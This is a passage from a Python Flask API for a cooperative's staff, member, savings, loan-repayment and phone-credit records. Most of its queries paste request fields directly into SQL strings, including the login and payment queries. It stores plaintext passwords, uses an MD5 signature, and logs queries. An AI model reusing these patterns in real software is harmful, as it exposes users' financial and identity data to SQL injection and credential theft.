\"SELECT id+1 FROM `tb_ms_login` ORDER BY id DESC limit 1;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = \"PG\"+str(jumlah_row)\n db.close()\n return json.dumps(res_data)\n\n\n@app.route('/register_petugas', methods=[\"POST\",\"GET\"])\ndef 
register():\n try:\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n username = data['username']\n password = data['password']\n fullname = data['fullname']\n email = data['email']\n address = data['address']\n jenis_role = data['jenis_role']\n registered_by = data['registered_by']\n id_petugas = data['id_petugas']\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\"SELECT count(id) as jumlah FROM `tb_ms_login` where username = '\"+username+\"' or email = '\"+email+\"';\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n if jumlah_row > 0 :\n res_data['response'] = 'NOK'\n res_data['msg'] = 'User Already Registered'\n return json.dumps(res_data)\n\n q_insert = (\"INSERT INTO `tb_ms_login` (username, password, fullname, email, address, jenis_role, registered_by, id_petugas) values ('\"+username+\"','\"+password+\"','\"+fullname+\"','\"+email+\"','\"+address+\"','\"+jenis_role+\"','\"+registered_by+\"','\"+id_petugas+\"');\")\n curr.execute(q_insert)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'User Registered'\n return json.dumps(res_data)\n\n except Exception as e:\n res_data = {}\n app.logger.error('An error occured.')\n app.logger.error(e)\n res_data['ACK'] = 'NOK'\n res_data['msg'] = str(e)\n return json.dumps(res_data)\n\n\n@app.route('/inquiry_petugas', methods=[\"GET\",])\ndef inquiry_petugas():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT id_petugas, fullname, email, address, username, jenis_role, registered_by FROM `tb_ms_login` WHERE flagactive = TRUE;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['petugas'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n@app.route('/modify_petugas', methods=[\"POST\",\"GET\"])\ndef modify_petugas():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_petugas = str(data['id_petugas'])\n nama_petugas = str(data['nama_petugas'])\n alamat_petugas = str(data['alamat_petugas'])\n email_petugas = str(data['email_petugas'])\n # edit_by = str(data['edit_by'])\n jenis_role = str(data['jenis_role'])\n\n db = connection.get_db()\n curr = db.cursor()\n q_modify = (\"UPDATE `db_koperasi`.`tb_ms_login` SET `fullname` = '\"+nama_petugas+\"', `address` = '\"+alamat_petugas+\"', `email` = '\"+email_petugas+\"', `jenis_role` = '\"+jenis_role+\"' WHERE `id_petugas` = '\"+id_petugas+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Data Petugas Berhasil diUpdate'\n return json.dumps(res_data)\n\n@app.route('/delete_petugas', methods=[\"POST\",\"GET\"])\ndef delete_petugas():\n res_data = {}\n print (request.json)\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_petugas = str(data['id_petugas'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n q_modify = (\"UPDATE `db_koperasi`.`tb_ms_login` set `flagactive` = FALSE WHERE `id_petugas` = '\"+id_petugas+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Petugas Berhasil Dihapus dari sistem'\n return 
json.dumps(res_data)\n\n@app.route('/login', methods=[\"POST\",\"GET\"])\ndef login():\n try:\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n username = data['username']\n password = data['password']\n print (data)\n if (data['signature'] != hashlib.md5(username+password).hexdigest()):\n res_data['response'] = 'NOK'\n res_data['msg'] = 'Invalid Signature!'\n print(data['signature'])\n print(hashlib.md5(username+password).hexdigest())\n return json.dumps(res_data)\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\"SELECT fullname, username, jenis_role FROM `tb_ms_login` where username = '\"+username+\"' and password = '\"+password+\"';\")\n app.logger.info(q_is_exist)\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n if len(rs) < 1:\n res_data['response'] = 'NOK'\n res_data['msg'] = 'Username atau password salah, Mohon cek kembali!!!'\n return json.dumps(res_data)\n fullname = rs[0][0]\n username = rs[0][1]\n jenis_role = rs[0][2]\n if (fullname != None or username != None) :\n res_data['response'] = 'OK'\n res_data['msg'] = 'Success Login!!'\n res_data['fullname'] = fullname\n res_data['jenis_role'] =jenis_role\n app.logger.info(res_data)\n return json.dumps(res_data)\n except Exception as e:\n res_data = {}\n app.logger.error('An error occured.')\n app.logger.error(e)\n res_data['ACK'] = 'NOK'\n res_data['msg'] = str(e)\n return json.dumps(res_data)\n\n@app.route('/register_anggota', methods=[\"POST\",\"GET\"])\ndef register_anggota():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_anggota = data['id_anggota']\n nama = data['nama_anggota']\n ktp = data['ktp']\n alamat = data['alamat']\n telepon = data['telepon']\n petugas = data['insert_by']\n tanggal_registrasi = data['tanggal_registrasi']\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_anggota) as jumlah FROM `tb_anggota` where ktp = '\" + ktp + \"';\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n if jumlah_row > 0:\n res_data['response'] = 'NOK'\n res_data['msg'] = 'KTP Anggota Telah Terdaftar'\n return json.dumps(res_data)\n\n q_insert = (\n \"INSERT INTO `tb_anggota` (tanggal_registrasi, id_anggota, nama_anggota, ktp, alamat, telepon, insert_by, flag_active) values ('\" + tanggal_registrasi + \"','\" + id_anggota + \"','\" + nama + \"','\" + ktp + \"','\" + alamat + \"','\" + telepon + \"','\" + petugas + \"','t');\")\n curr.execute(q_insert)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Anggota berhasil didaftarkan'\n return json.dumps(res_data)\n\n\n@app.route('/inquiry_anggota/', methods=[\"GET\",])\ndef inquiry_anggota(id):\n res_data = {}\n if request.method == 'GET':\n prefix = 'UTI/AGT000'\n id_anggota = prefix + id\n db = connection.get_db()\n curr = db.cursor()\n sql_inquiry = (\n \"select `id_anggota`, `nama_anggota`, `ktp`, `alamat`, `telepon`, concat('Rp ',format(`simpanan_wajib`,2)), concat('Rp ',format(`simpanan_pokok`,2)), concat('Rp ',format(`simpanan_suka`,2)), concat('Rp ',format(`simpanan_wajib` + `simpanan_pokok` + `simpanan_suka`,2)) as `saldo`, `insert_by`, `edit_by`, `tanggal_registrasi`, `tanggal_modifikasi` from `db_koperasi`.`tb_anggota` where 1=1\")\n if (id_anggota == 'UTI/AGT0000'):\n sql_inquiry = sql_inquiry + \" and flag_active = 
't';\"\n else:\n sql_inquiry = sql_inquiry + \" and id_anggota = '%s';\" % id_anggota\n print (sql_inquiry)\n curr.execute(sql_inquiry)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['anggota'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n\n@app.route('/modify_anggota', methods=[\"POST\",\"GET\"])\ndef modify_anggota():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_anggota = str(data['id_anggota'])\n nama_anggota = str(data['nama_anggota'])\n ktp = str(data['ktp'])\n alamat = str(data['alamat'])\n telepon = str(data['telepon'])\n edit_by = str(data['edit_by'])\n tanggal_modifikasi = str(data['tanggal_modifikasi'])\n old_ktp = str(data['ktp_old'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n if ktp != old_ktp:\n q_is_exist = (\n \"SELECT count(id_anggota) as jumlah FROM `tb_anggota` where ktp = '\" + ktp + \"' and flag_active = 't';\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n if jumlah_row > 0:\n res_data['response'] = 'NOK'\n res_data['msg'] = 'KTP Anggota Telah Terdaftar'\n return json.dumps(res_data)\n\n q_modify = (\"UPDATE `db_koperasi`.`tb_anggota` SET `nama_anggota` = '\"+nama_anggota+\"', `alamat` = '\"+alamat+\"', `telepon` = '\"+telepon+\"', `edit_by` = '\"+edit_by+\"', `ktp` = '\"+ktp+\"', `tanggal_modifikasi` = '\"+tanggal_modifikasi+\"' WHERE `id_anggota` = '\"+id_anggota+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Data Anggota Berhasil diUpdate'\n return json.dumps(res_data)\n\n\n@app.route('/delete_anggota', methods=[\"POST\",\"GET\"])\ndef delete_anggota():\n res_data = {}\n print (request.json)\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_anggota = str(data['id_anggota'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n q_modify = (\"UPDATE `db_koperasi`.`tb_anggota` set `flag_active` = 'f' WHERE `id_anggota` = '\"+id_anggota+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Anggota Berhasil Dihapus dari sistem'\n return json.dumps(res_data)\n\n\n\n\n# SETORAN\n\n@app.route('/get_id_transaksi_setoran', methods=[\"GET\",])\ndef get_idtransaksi_setoran():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_anggota) as jumlah FROM `tb_setoran`;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = 'UTI/SMP'+str(datetime.datetime.today().strftime('%Y%m%d'))+str(jumlah_row+1)\n\n q_is_exist = (\n \"SELECT id_anggota, nama_anggota FROM `tb_anggota` where `flag_active`='t' order by nama_anggota;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['anggota_arr'] = rs\n db.close()\n return json.dumps(res_data)\n\n@app.route('/inquiry_setoran', methods=[\"GET\",])\ndef inquiry_setoran():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n sql_inquiry = (\"select `id_transaksi`, `id_anggota`, `nama_anggota`, `jenis_simpanan`, concat('Rp ',format(`nominal`,2)), concat('Rp ', format(`saldo`,2)), `insert_date`, `insert_by` from `tb_setoran` order by cast(replace(`id_transaksi`,'UTI/SMP','') as 
UNSIGNED)\")\n print (sql_inquiry)\n curr.execute(sql_inquiry)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['anggota'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n@app.route('/modify_setoran', methods=[\"POST\",\"GET\"])\ndef modify_setoran():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_transaksi = str(data['id_transaksi'])\n id_anggota = str(data['id_anggota'])\n jenis_simpanan = str(data['jenis_simpanan'])\n nominal = str(data['nominal'])\n edit_by = str(data['insert_by'])\n tanggal_modifikasi = str(data['tanggal_setoran'])\n\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n q_is_exist = (\n \"select `id_anggota`, `nama_anggota`, `simpanan_wajib`, `simpanan_pokok`, `simpanan_suka`, `simpanan_wajib` + `simpanan_pokok` + `simpanan_suka` as `saldo`, `edit_by`, `tanggal_modifikasi` from `db_koperasi`.`tb_anggota` where 1=1 and `id_anggota` = '\"+id_anggota+\"' and `flag_active` = 't';\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n simpanan_wajib = str(rs[0][2])\n simpanan_pokok = str(rs[0][3])\n simpanan_suka = str(rs[0][4])\n saldo = str(rs[0][5])\n nama_anggota = rs[0][1]\n if jenis_simpanan == \"simpanan_suka\":\n simpanan_suka = str(int(simpanan_suka) + int(nominal))\n if jenis_simpanan == \"simpanan_pokok\" :\n simpanan_pokok = str(int(simpanan_pokok) + int(nominal))\n if jenis_simpanan == \"simpanan_wajib\" :\n simpanan_wajib = str(int(simpanan_wajib)+int(nominal))\n lb_setoran = str(int(saldo) + int(nominal))\n\n print (type(id_anggota))\n print (type(simpanan_suka))\n print (type(simpanan_wajib))\n print (type(simpanan_pokok))\n print (type(saldo))\n\n q_modify = (\"UPDATE `db_koperasi`.`tb_anggota` SET `simpanan_wajib` = '\"+simpanan_wajib+\"', `simpanan_pokok` = '\"+simpanan_pokok+\"', `simpanan_suka` = '\"+simpanan_suka+\"', `edit_by` = '\"+edit_by+\"', `tanggal_modifikasi` = '\"+tanggal_modifikasi+\"' WHERE `id_anggota` = '\"+id_anggota+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n\n q_insert_tb_setoran = (\"INSERT INTO `db_koperasi`.`tb_setoran` ( `id_transaksi`, `id_anggota`, `nama_anggota`, `jenis_simpanan`, `nominal`, `saldo`, `insert_date`, `insert_by` ) VALUES ( '\"+id_transaksi+\"', '\"+id_anggota+\"', '\"+nama_anggota+\"', '\"+jenis_simpanan+\"', '\"+nominal+\"', '\"+lb_setoran+\"', '\"+tanggal_modifikasi+\"', '\"+edit_by+\"' );\")\n print (q_modify)\n curr.execute(q_insert_tb_setoran)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Saldo Berhasil diUpdate'\n return json.dumps(res_data)\n\n\n# PINJAMAN\n\n@app.route('/get_id_transaksi_pinjaman', methods=[\"GET\",])\ndef get_idtransaksi_pinjaman():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_kredit) as jumlah FROM `tb_kredit`;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = 'UTI/PNJ'+str(datetime.datetime.today().strftime('%Y%m%d'))+str(jumlah_row+1)\n\n q_is_exist = (\"SELECT tb_anggota.id_anggota, tb_anggota.nama_anggota FROM `tb_anggota` where tb_anggota.`flag_active`='t' and tb_anggota.id_anggota not in (select id_anggota from tb_kredit where lunas = 0) order by nama_anggota;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['anggota_arr'] = rs\n db.close()\n return 
json.dumps(res_data)\n\n@app.route('/register_pinjaman', methods=[\"POST\",\"GET\"])\ndef register_pinjaman():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_transaksi = str(data['id_transaksi'])\n id_anggota = str(data['id_anggota'])\n jumlah_pinjaman = str(data['jumlah_pinjaman'])\n bunga = str(data['bunga_pertahun'])\n tenor = str(data['tenor'])\n angsuran_perbulan = str(data['angsuran_perbulan'])\n flag_active = 't'\n insert_date = str(data['tanggal_setoran'])\n insert_by = str(data['insert_by'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n\n q_check_tb_kredit =()\n\n q_insert_tb_kredit = (\"INSERT INTO `db_koperasi`.`tb_kredit` ( `id_kredit`, `id_anggota`, `jumlah_pinjaman`, `bunga`, `lama_cicilan`, `angsuran`, `flag_active`, `insert_date`, `insert_by` ) VALUES ( '\"+id_transaksi+\"', '\"+id_anggota+\"', '\"+jumlah_pinjaman+\"', '\"+bunga+\"', '\"+tenor+\"', '\"+angsuran_perbulan+\"', '\"+flag_active+\"', '\"+insert_date+\"', '\"+insert_by+\"');\")\n print (q_insert_tb_kredit)\n curr.execute(q_insert_tb_kredit)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Pinjaman berhasil diajukan'\n return json.dumps(res_data)\n\n@app.route('/inquiry_pinjaman', methods=[\"GET\",])\ndef inquiry_pinjaman():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n sql_inquiry = (\"SELECT a.id_kredit, a. id_anggota, b.nama_anggota, concat('Rp ', format(b.saldo,2)), concat('Rp ', format(a.jumlah_pinjaman,2)), concat(a.bunga, '%'), concat(a.lama_cicilan, ' Bulan'), concat('Rp ', format(a.angsuran,2)), a.insert_date, a.insert_by, a.sisa_angsuran, concat('Rp ',format(a.sisa_pinjaman,2)) FROM tb_kredit a JOIN ( SELECT id_anggota, nama_anggota, cast( simpanan_wajib AS SIGNED ) + cast( simpanan_suka AS SIGNED ) + cast( simpanan_pokok AS SIGNED ) saldo FROM tb_anggota ) b ON a.id_anggota = b.id_anggota\")\n print (sql_inquiry)\n curr.execute(sql_inquiry)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['anggota'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n# PENGAMBILAN\n@app.route('/get_id_transaksi_pengambilan_pinjaman', methods=[\"GET\",])\ndef get_id_transaksi_pengambilan_pinjaman():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_pengambilan) as jumlah FROM `tb_kredit`;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = 'UTI/PBL'+str(datetime.datetime.today().strftime('%Y%m%d'))+str(jumlah_row+1)\n\n q_is_exist = (\n \"SELECT tb_kredit.id_anggota, tb_anggota.nama_anggota, tb_kredit.jumlah_pinjaman FROM `tb_anggota` join `tb_kredit` on tb_anggota.id_anggota = tb_kredit.id_anggota where tb_kredit.`flag_active`='t' and tb_kredit.id_pengambilan is NULL order by nama_anggota;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['anggota_arr'] = rs\n db.close()\n return json.dumps(res_data)\n\n@app.route('/get_detail_pinjaman/UTI/', methods=[\"GET\",])\ndef get_detail_pinjaman(id_anggota):\n res_data = {}\n if request.method == 'GET':\n id_anggota_ = \"UTI/\"+id_anggota\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT tb_kredit.id_anggota, tb_anggota.nama_anggota, concat('Rp ', format(tb_kredit.jumlah_pinjaman,2)), concat('Rp ', 
format((simpanan_suka+simpanan_pokok+simpanan_wajib),2)) as saldo, id_kredit FROM `tb_anggota` join `tb_kredit` on tb_anggota.id_anggota = tb_kredit.id_anggota where tb_kredit.`flag_active`='t' and tb_kredit.lunas = 0 and tb_kredit.id_anggota = '\"+id_anggota_+\"' order by nama_anggota;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['id_anggota'] = rs[0][0]\n res_data['nama_anggota'] = rs[0][1]\n res_data['jumlah_pinjaman'] = rs[0][2]\n res_data['saldo'] = rs[0][3]\n res_data['id_kredit'] = rs[0][4]\n res_data['response'] = 'OK'\n db.close()\n return json.dumps(res_data)\n\n@app.route('/register_pengambilan', methods=[\"POST\",\"GET\"])\ndef register_pengambilan():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n print (data)\n id_transaksi_pengambilan = str(data['id_transaksi_pengambilan'])\n id_transaksi_peminjaman = str(data['id_transaksi_peminjaman'])\n id_anggota = str(data['id_anggota'])\n tanggal_pengambilan = str(data['tanggal_pengambilan'])\n insert_by = str(data['insert_by'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n q_insert_tb_pengambilan = (\"INSERT INTO `db_koperasi`.`tb_pengambilan` ( `id_transaksi_pengambilan`, `id_transaksi_peminjaman`, `tanggal_pengambilan`, `id_anggota`, `insert_by`) VALUES ( '\"+id_transaksi_pengambilan+\"', '\"+id_transaksi_peminjaman+\"', '\"+tanggal_pengambilan+\"', '\"+id_anggota+\"', '\"+insert_by+\"');\")\n print (q_insert_tb_pengambilan)\n curr.execute(q_insert_tb_pengambilan)\n q_update_tb_kredit = (\"UPDATE `db_koperasi`.`tb_kredit` SET `id_pengambilan` = '\"+id_transaksi_pengambilan+\"', `tanggal_pengambilan` = '\"+tanggal_pengambilan+\"', `update_by` = '\"+insert_by+\"', sisa_pinjaman = jumlah_pinjaman, sisa_angsuran = lama_cicilan WHERE `id_kredit` = '\"+id_transaksi_peminjaman+\"';\")\n print(q_update_tb_kredit)\n curr.execute(q_update_tb_kredit)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Pengambilan berhasil dilakukan'\n return json.dumps(res_data)\n\n@app.route('/inquiry_pengambilan', methods=[\"GET\",])\ndef inquiry_pengambilan():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n sql_inquiry = (\"select a.`id_transaksi_pengambilan`, a.`id_transaksi_peminjaman`, a.`tanggal_pengambilan`, a.`id_anggota`, b.`nama_anggota`,concat('Rp ',format(c.`jumlah_pinjaman`,2)), a.`insert_by` from `db_koperasi`.`tb_pengambilan` a join tb_anggota b on a.id_anggota = b.id_anggota join tb_kredit c on a.`id_transaksi_peminjaman` = c.id_kredit ORDER BY a.tanggal_pengambilan\")\n print (sql_inquiry)\n curr.execute(sql_inquiry)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['anggota'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n\n# PEMBAYARAN_CICILAN\n@app.route('/get_id_transaksi_pembayaran', methods=[\"GET\",])\ndef get_id_transaksi_pembayaran():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id_pembayaran) as jumlah FROM `tb_pembayaran`;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = 'UTI/ANS'+str(datetime.datetime.today().strftime('%Y%m%d'))+str(jumlah_row+1)\n\n q_is_exist = (\"SELECT\\n\" +\n \"\tta.id_anggota, ta.nama_anggota, kr.id_kredit, id_pengambilan\\n\" +\n \"FROM\\n\" +\n \"\t`tb_kredit` kr\\n\" +\n \"\tLEFT 
JOIN tb_pembayaran pb ON kr.id_kredit = pb.id_kredit\\n\" +\n \"\tJOIN tb_anggota ta on ta.id_anggota = kr.id_anggota\\n\" +\n \"WHERE\\n\" +\n \"\tkr.id_pengambilan IS NOT NULL\\n\" +\n \"\tand kr.lunas = 0\\n\" +\n \"\tGROUP BY ta.id_anggota, ta.nama_anggota, kr.id_kredit, id_pengambilan\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['anggota_arr'] = rs\n db.close()\n return json.dumps(res_data)\n\n@app.route('/inquiry_pembayaran', methods=[\"POST\",\"GET\"])\ndef inquiry_pembayaran():\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n print (data)\n app.logger.info(\"input :\" + str(data))\n id_kredit = str(data['id_kredit'])\n db = connection.get_db()\n curr = db.cursor()\n\n q = (\"SELECT\\n\" +\n \"\tkr.jumlah_pinjaman,\\n\" +\n \"CASE\\n\" +\n \"\t\\n\" +\n \"\tWHEN count( pb.id_kredit ) = 0 THEN\\n\" +\n \"\tADDDATE( kr.tanggal_pengambilan, INTERVAL 1 MONTH ) \\n\" +\n \"\tWHEN count( pb.id_kredit ) > 0 THEN\\n\" +\n \"\tADDDATE( max( tanggal_pembayaran ), INTERVAL 1 MONTH ) \\n\" +\n \"\tEND AS jatuh_tempo,\\n\" +\n \"\tkr.angsuran,\\n\" +\n \"\tkr.jumlah_pinjaman - (sum(COALESCE(pb.jumlah_pembayaran,0)) - sum(COALESCE(pb.denda,0))) - kr.angsuran sisa_pinjaman,\\n\" +\n \"CASE\\n\" +\n \"\t\t\\n\" +\n \"\t\tWHEN ( count( pb.id_kredit ) = 0 AND ADDDATE( kr.tanggal_pengambilan, INTERVAL 1 MONTH ) < CURDATE( ) ) \\n\" +\n \"\t\tOR (\\n\" +\n \"\t\t\tcount( pb.id_kredit ) > 0 \\n\" +\n \"\t\t\tAND ADDDATE( max( pb.tanggal_pembayaran ), INTERVAL 1 MONTH ) < CURDATE( ) \\n\" +\n \"\t\t\t) THEN\\n\" +\n \"\t\t\t25000 ELSE 0 \\n\" +\n \"\t\tEND AS denda,\\n\" +\n \"\tCASE\\n\" +\n \"\t\t\t\\n\" +\n \"\t\t\tWHEN (count(pb.id_kredit) = 0 AND ADDDATE( kr.tanggal_pengambilan, INTERVAL 1 MONTH ) < CURDATE( ) ) \\n\" +\n \"\t\t\tOR (\\n\" +\n \"\t\t\t\tcount( pb.id_kredit ) > 0 \\n\" +\n \"\t\t\t\tAND ADDDATE( max( pb.tanggal_pembayaran ), INTERVAL 1 MONTH ) < CURDATE( ) \\n\" +\n \"\t\t\t\t) THEN\\n\" +\n \"\t\t\t\t25000 + kr.angsuran ELSE kr.angsuran \\n\" +\n \"\t\t\tEND AS jumlah_pembayaran,\\n\" +\n \"\t\tcount(pb.id_kredit) + 1 as pembayaran_ke,\\n\" +\n \"\t\tkr.lama_cicilan - count(pb.id_kredit) -1 as sisa_angsuran\\n\" +\n \"\t\tFROM\\n\" +\n \"\t\t\ttb_kredit kr\\n\" +\n \"\t\t\tLEFT JOIN tb_pembayaran pb ON kr.id_kredit = pb.id_kredit \\n\" +\n \"\t\tWHERE\\n\" +\n \"\t\t\tkr.id_kredit = '\"+id_kredit+\"' \\n\" +\n \"\tGROUP BY\\n\" +\n \"kr.jumlah_pinjaman\")\n\n curr.execute(q)\n rs = curr.fetchone()\n rs_data = {}\n if len(rs) > 0 :\n rs_data[\"response\"] = \"OK\"\n rs_data[\"jumlah_pinjaman\"] = str(rs[0])\n rs_data[\"jatuh_tempo\"] = str(str(rs[1]))\n rs_data[\"angsuran\"] = str(rs[2])\n rs_data[\"sisa_pinjaman\"] = int(rs[3])\n if int(rs[7]) == 0 :\n rs_data[\"sisa_pinjaman\"] = 0\n rs_data[\"denda\"] = str(rs[4])\n rs_data[\"jumlah_pembayaran\"] = str(rs[5])\n rs_data[\"pembayaran_ke\"] = str(rs[6])\n rs_data[\"sisa_angsuran\"] = int(rs[7])\n else :\n rs_data[\"response\"] = 'NOK'\n return json.dumps(rs_data)\n\n\n@app.route('/bayar_cicilan', methods=[\"POST\",\"GET\"])\ndef bayar_cicilan():\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n print (data)\n app.logger.info(\"input :\" + str(data))\n id_pembayaran = data[\"id_pembayaran\"]\n id_anggota = data[\"id_anggota\"]\n tanggal_pembayaran = data[\"tanggal_pembayaran\"]\n denda = data[\"denda\"]\n tanggal_tempo_pembayaran = data[\"tanggal_tempo_pembayaran\"]\n 
jumlah_pembayaran = data[\"jumlah_pembayaran\"]\n sisa_pinjaman = data[\"sisa_pinjaman\"]\n id_kredit = data[\"id_kredit\"]\n angsuran_ke = data[\"angsuran_ke\"]\n sisa_angsuran = data[\"sisa_angsuran\"]\n insert_by = data[\"insert_by\"]\n db = connection.get_db()\n curr = db.cursor()\n\n q = (\"INSERT INTO `db_koperasi`.`tb_pembayaran` ( `id_pembayaran`, `id_anggota`, `tanggal_pembayaran`, `denda`, `tanggal_tempo_pembayaran`, `jumlah_pembayaran`, `sisa_pinjaman`, `id_kredit`, `angsuran_ke`, `sisa_angsuran`, `insert_by` )\\n\" +\n \"VALUES\\n\" +\n \"\t( '\"+id_pembayaran+\"', '\"+id_anggota+\"', '\"+tanggal_pembayaran+\"', \"+denda+\", '\"+tanggal_tempo_pembayaran+\"', \"+jumlah_pembayaran+\", \"+sisa_pinjaman+\", '\"+id_kredit+\"', \"+angsuran_ke+\", \"+sisa_angsuran+\", '\"+insert_by+\"' )\")\n curr.execute(q)\n if int(sisa_angsuran) != 0 :\n lunas = '0'\n else :\n lunas = '1'\n sisa_angsuran = '0'\n sisa_pinjaman = '0'\n\n q_update = (\"update tb_kredit set sisa_pinjaman = \"+sisa_pinjaman+\", sisa_angsuran = \"+sisa_angsuran+\", lunas = \"+lunas+\" where id_kredit = '\"+id_kredit+\"'\")\n curr.execute(q_update)\n db.commit()\n res_data = {}\n res_data['response'] = 'OK'\n res_data['msg'] = 'Pembayran Cicilan berhasil dilakukan'\n return json.dumps(res_data)\n\n\n\n\n\n# INPUT PENJUALAN PULSA\n\n@app.route('/penjualan_pulsa_get_id', methods=[\"GET\",])\ndef penjualan_pulsa_get_id():\n now = datetime.datetime.now()\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT count(id),CURDATE() FROM `tr_transaksi` where date(`timestamp`) = CURDATE();\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n now = now.strftime(\"%Y%m%d\")\n res_data['response'] = 'OK'\n res_data['msg'] = 'P'+ now + str(jumlah_row+1)\n db.close()\n return json.dumps(res_data)\n\n\n@app.route('/get_operator_denom_by_prefix', methods=[\"POST\",\"GET\"])\ndef get_operator_denom_by_prefix():\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n print (data)\n print(\"input :\" + str(data))\n no_hp = str(data['no_hp'])\n prefix = no_hp[0:4]\n db = connection.get_db()\n curr = db.cursor()\n\n q = (\"select ms_prefix.nama_operator, ms_produk.nama_produk from ms_prefix left join ms_produk on ms_prefix.nama_operator = ms_produk.nama_operator where 